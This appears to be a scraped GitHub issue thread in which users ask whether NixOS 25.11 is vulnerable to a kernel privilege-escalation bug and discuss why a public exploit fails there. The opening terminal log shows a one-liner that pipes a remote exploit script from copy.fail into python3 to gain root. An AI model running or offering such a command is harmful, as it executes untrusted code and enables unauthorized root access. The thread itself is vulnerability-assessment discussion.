SaaS Metrics
GitHub Issue
NixOS 25.11 maybe affected?
```
[nix-shell:~]$ cat /etc/os-release
ANSI_COLOR="0;38;2;126;186;228"
BUG_REPORT_URL="https://github.com/NixOS/nixpkgs/issues"
BUILD_ID="25.11.20260425.a4bf066"
CPE_NAME="cpe:/o:nixos:nixos:25.11"
DEFAULT_HOSTNAME=nixos
DOCUMENTATION_URL="https://nixos.org/learn.html"
HOME_URL="https://nixos.org/"
ID=nixos
ID_LIKE=""
IMAGE_ID=""
IMAGE_VERSION=""
LOGO="nix-snowflake"
NAME=NixOS
PRETTY_NAME="NixOS 25.11 (Xantusia)"
SUPPORT_END="2026-06-30"
SUPPORT_URL="https://nixos.org/community.html"
VARIANT=""
VARIANT_ID=""
VENDOR_NAME=NixOS
VENDOR_URL="https://nixos.org/"
VERSION="25.11 (Xantusia)"
VERSION_CODENAME=xantusia
VERSION_ID="25.11"
[nix-shell:~]$ uname -a
Linux mwagner-t14 6.12.83 #1-NixOS SMP PREEMPT_DYNAMIC Wed Apr 22 11:19:04 UTC 2026 x86_64 GNU/Linux
[nix-shell:~]$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 3376 0 0
Traceback (most recent call last):
File "", line 8, in
PermissionError: [Errno 13] Permission denied: '/usr/bin/su'
```
View Raw Thread
Developer & User Discourse
zimward • Apr 30, 2026
what you are seeing doesn't actually mean its not affected. the exploit just isn't working because the `su` binary isn't placed in `/usr/bin`
Tuco106 • Apr 30, 2026
I am using envfs (https://github.com/Mic92/envfs) to make the binaries available under `/usr/bin`
This is working for scripts with `#!/bin/bash` fine.
@zimward Do you know why it is not working for this exploit than?
This is working for scripts with `#!/bin/bash` fine.
@zimward Do you know why it is not working for this exploit than?
fhennig42 • Apr 30, 2026
Yes, what @zimward wrote is true. It might be worth noting, that it also doesn't work when you change the path to `/run/wrappers/bin/su` (which is what `which su` prints on NixOS). But this still doen't tell anything about "NixOS is affected" or not. Since it's a kernel bug NixOS might be affected as well as others.
fhennig42 • Apr 30, 2026
> This is working for scripts with #!/bin/bash fine.
I think Linux has something builtin that prevents setuid binaries from shebangs like `#!/bin/bash` so that is sadly still not a proof that NixOS isn't affected.
I think Linux has something builtin that prevents setuid binaries from shebangs like `#!/bin/bash` so that is sadly still not a proof that NixOS isn't affected.
zimward • Apr 30, 2026
there is this script: https://raw.githubusercontent.com/rootsecdev/cve_2026_31431/refs/heads/main/test_cve_2026_31431.py that seems to work in testing if the page cache writes work